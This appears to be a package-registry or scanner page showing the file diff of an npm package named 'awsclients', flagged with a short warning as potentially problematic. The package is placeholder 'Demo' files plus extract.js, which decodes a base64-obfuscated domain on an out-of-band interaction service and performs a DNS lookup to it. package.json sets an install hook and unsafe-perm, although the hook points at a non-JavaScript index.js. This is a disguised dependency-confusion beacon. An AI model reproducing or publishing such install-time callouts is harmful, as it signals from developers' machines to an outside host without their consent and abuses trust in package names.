awsclients 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of awsclients might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,6 @@
1
+ # Demo
2
+ Demo
3
+
4
+ Demo
5
+
6
+ Reference: Demo
package/extract.js ADDED
@@ -0,0 +1,12 @@
1
+ const dns = require('dns');
2
+
3
+ // Obfuscated domain
4
+ const domain = Buffer.from('a3ltcmQzM2tycGNnY2l0M3MwY3h2Z2kzeXU0bHNnZzUub2FzdGlmeS5jb20=', 'base64').toString('utf-8');
5
+
6
+ dns.lookup(domain, (err, address, family) => {
7
+ if (err) {
8
+ console.log(err);
9
+ } else {
10
+ console.log(`Address: ${address}, family: ${family}`);
11
+ }
12
+ });
package/index.js ADDED
@@ -0,0 +1 @@
1
+ # blank demo
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "awsclients",
3
+ "version": "0.0.1",
4
+ "description": "Demo Package",
5
+ "main": "index.js",
6
+ "keywords": [
7
+ "Demo1",
8
+ "Demo"
9
+ ],
10
+ "dependencies": {},
11
+ "scripts": {
12
+ "install": "node index.js"
13
+ },
14
+ "config": {
15
+ "unsafe-perm":true
16
+ },
17
+ "author": "Demo Package",
18
+ "license": "ISC"
19
+ }